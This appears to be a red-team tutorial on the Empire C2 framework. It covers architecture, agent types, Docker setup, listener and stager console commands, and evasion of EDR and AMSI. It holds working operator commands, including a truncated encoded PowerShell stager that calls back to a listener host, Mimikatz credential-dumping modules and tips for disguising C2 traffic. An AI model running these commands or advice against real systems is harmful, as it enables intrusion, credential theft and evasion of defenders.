Empire: the open-source C2 that taught a generation

Empire is the open-source C2 that taught a generation of operators how a real post-exploitation framework hangs together. The premise was simple: PowerShell is already running on every modern Windows endpoint, so you don’t need to drop a binary if you can drive the existing scripting surface from a beacon. Get a foothold, blend in with admin activity, pull what you need without ever writing to disk.

Empire’s role in 2026 is more bounded than it was in 2018. Mature engagements have largely shifted to Sliver (Bishop Fox, Go), Mythic (SpecterOps, Python control plane with a diverse agent ecosystem), and Havoc (C5pider). Empire is still useful for labs, training, and PowerShell-heavy Active Directory work where its module library and built-in PowerView/Mimikatz/PowerSploit integrations save real time. The listener/stager/agent loop it codified is what every modern C2 implements under different names, which means knowing Empire is still the cheapest way to understand how any of those frameworks actually work.

Architecture

#

Empire’s topology is the canonical one. Three components, each named the way you’d expect:

1. Listener. The service waiting on your C2 host to receive incoming connections from agents. HTTP, HTTPS, and a handful of “cloud” listeners (OneDrive, Dropbox, MS Graph) that tunnel C2 through services the target environment is unlikely to block.
2. Stager. The initial dropper. Small enough to deliver via a Word macro, a one-liner, or a clipboard paste. Its only job is to reach back to the listener and pull down the full agent.
3. Agent. The full session, post-stage. The thing you actually interact with: run modules, push files, dump creds, pivot.

Agents Empire ships in 2026

#

The 5.x branch ships four agent flavors. You pick based on what’s already on the target and what the EDR is looking at:

• PowerShell agent. The original. Still works but is the most aggressively monitored surface on a modern Windows endpoint. powershell.exe invocations get hit by AMSI, the Microsoft-Windows-PowerShell ETW provider, and every EDR’s script-block logging telemetry.
• Python agent. Linux and macOS. Useful for cross-platform engagements where the target is a Mac or a Linux workstation.
• IronPython agent. Introduced in Empire 5.0. Runs a Python interpreter inside the .NET CLR on Windows. The trick: the process is .NET, not powershell.exe, so signatures targeting PowerShell don’t fire. EDR still sees a .NET process loading dynamic assemblies, which is its own signature, but it’s a different signature than the one most rules were written against.
• Sharpire (C# agent). Compiled C# beacon. Smallest footprint and the least PowerShell-flavored telemetry. Useful when you’ve already burned PowerShell on the target.

Quick start

#

The easiest install is the official Docker image:

docker pull bcsecurity/empire
docker run -it -p 1337:1337 -p 5000:5000 bcsecurity/empire

Port 1337 is Empire’s REST API. Port 5000 used to be Starkiller’s standalone web port. Since Empire 5.0, Starkiller is bundled as a submodule and served through the Empire API itself; the 5000 mapping is there for older client configurations.

Setting a listener

#

(Empire) > listeners
(Empire: listeners) > uselistener http
(Empire: listeners/http) > set Name http_public
(Empire: listeners/http) > set Port 80
(Empire: listeners/http) > set Host http://192.168.1.50
(Empire: listeners/http) > execute
[*] Listener 'http_public' successfully started

Generating a stager

#

Multiple launcher flavors are available; the PowerShell launcher is the path-of-least-resistance for a Windows target:

(Empire) > usestager multi/launcher
(Empire: stager/multi/launcher) > set Listener http_public
(Empire: stager/multi/launcher) > generate
[*] Payload generated!
powershell -noP -sta -w 1 -enc SQBm...

The base64-encoded blob is the one you deliver. On 2026 Windows, that exact command line is dead on arrival against any reasonable EDR. The example is here for the calling pattern, so you can see what the launcher actually looks like before getting wrapped, obfuscated, or rewritten as a Sharpire/IronPython equivalent.

Working with an agent

#

Once a stager lands and you have an agent (check via agents), Empire’s module library is where the time savings show up. A handful of the standard moves:

# Domain enumeration via PowerView
usemodule powershell/situational_awareness/network/powerview/get_domain_user
set Agent <AgentID>
execute

# Local privilege escalation checks (PowerUp)
usemodule powershell/privesc/powerup/allchecks
execute

# Credential dumping (Mimikatz logonpasswords)
usemodule powershell/credentials/mimikatz/logonpasswords
execute

Empire wraps PowerView, PowerUp, PowerSploit, and Mimikatz into named modules. That’s most of what made it the standard learning C2: every named AD technique from 2015 onward had an Empire module to demonstrate it.

Traffic and evasion

#

Out-of-the-box Empire traffic looks like Empire traffic. The default URI structure, the default User-Agent, the default jitter pattern: all of it is fingerprinted by mature SOC tooling and any Suricata ruleset that’s been updated since 2020. To survive past the first hour against a target with a competent blue team, the listener has to be reshaped.

Malleable C2 is the concept Raphael Mudge introduced in Cobalt Strike 2.0 (2014) for exactly this. Empire borrowed the idea and exposes per-listener customization for:

• User-Agent string. Anything from a real Chrome version to a Windows Update Agent. Match the User-Agent distribution the target environment actually generates.
• Jitter. Randomize the check-in interval so the traffic doesn’t show as a perfect-interval beacon. Common: 60 seconds with 30% jitter, meaning 42–78 second intervals.
• URI paths. The default /admin/get.php is signatured. Pick something less obvious.
• Staging key. Randomize the symmetric key used to encrypt the initial stage. The default is well-known.

All of that is table stakes. Real evasion against a 2026 EDR estate involves a lot more (process injection, syscall-direct execution, sleep masking, certificate pinning around the C2 channel) and Empire’s stock implementation is not the right baseline for any of it. Sliver and Havoc both go meaningfully further out of the box, and commercial frameworks go further still.

AMSI and the PowerShell tax

#

PowerShell is the most-monitored scripting surface on Windows. The Antimalware Scan Interface (AMSI) scans every script block and downloaded buffer before execution. Empire’s PowerShell modules are heavily fingerprinted by Defender and most third-party AV/EDR products. Strings like Invoke-Mimikatz, Get-Keystrokes, and ReflectivePEInjection are signature triggers; Empire-prefixed function names are similarly hot.

The classic AMSI bypass was patching AmsiScanBuffer in memory to short-circuit the scan. That stopped being reliable around 2023, and in 2025–2026 Defender shipped behavioral signature builds (1.419.240.0 and later) that detect the in-memory patch itself. The patchless variants (DLL hijack, etw-based, sleep-then-patch) have specific signatures of their own now. AMSI bypass in 2026 is something you research against the specific Defender build your target is running, not a one-liner you copy off a 2021 blog post.

Empire ships built-in obfuscation (token manipulation, variable randomization, string obfuscation) that’s worth enabling globally, though it mostly blunts static signatures and doesn’t help against AMSI’s behavioral analysis. Renaming modules, function names, and embedded markers before loading them helps with the GitHub-string-search class of detections; anything that grep-finds “Invoke-Empire” in your loader will catch a default install instantly. The bigger move is shifting work off PowerShell entirely. The IronPython and Sharpire agents put you in .NET process space, which is still monitored but not nearly as hard as powershell.exe is, and the analyst rules looking for PowerShell-flavored tradecraft don’t fire on a .NET binary the same way.

When to use Empire

#

Empire still has real engagement uses. The main ones are training and CTF labs where AMSI bypass is the point of the exercise rather than a problem to dodge, PowerShell-heavy Active Directory work where the wrapped PowerView and Mimikatz modules save real time, and assessments of less-mature environments where modern EDR isn’t the threat model.

The places it stops being the right tool are pretty predictable. A long-haul engagement against a mature enterprise EDR is one of them: Empire’s default traffic profile is too well-fingerprinted and the PowerShell agents draw too much heat. So is anything where you need substantial customization of the C2 channel beyond what malleable-style tweaking gets you. So is any engagement where attribution to Empire would compromise the operation, since Empire usage gets flagged immediately in incident response.

For those, look at Sliver (Go-based agent, MTLS by default, generally the best open-source default in 2026), Mythic if you can invest in writing or selecting agents to fit a specific operation, or Havoc when its built-in evasion features fit the brief. Empire’s place these days is upstream of all of them. The listener/stager/agent vocabulary it codified is the same vocabulary every modern framework uses, so an operator who actually understands Empire has a pretty short ramp to whatever else they end up running.